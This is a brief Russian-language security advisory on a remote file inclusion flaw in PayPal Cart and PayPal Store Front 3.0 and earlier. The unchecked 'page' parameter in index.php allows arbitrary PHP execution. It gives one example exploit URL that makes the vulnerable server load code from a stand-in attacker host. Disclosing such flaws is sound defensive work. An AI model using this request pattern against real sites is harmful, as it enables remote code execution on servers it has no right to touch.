Программа: PayPal Cart, PayPal Store Front 3.0 и более ранние версии 

Уязвимость обнаружена в PayPal Cart и PayPal Store Front. Злонамеренный пользователь может выполнить произвольный PHP код на уязвимом сервере.
Программное обеспечение не проверяет параметр "page" в сценарии "index.php". В результате удаленный пользователь может выполнить произвольный PHP код с привилегиями Web сервера. 

Пример/Эксплоит: 

http://www.vulnsite.com/index.php?do= ext&page=http://www.attacker.com/index 

Где http://www.attacker.com/index.php

Оставить мнение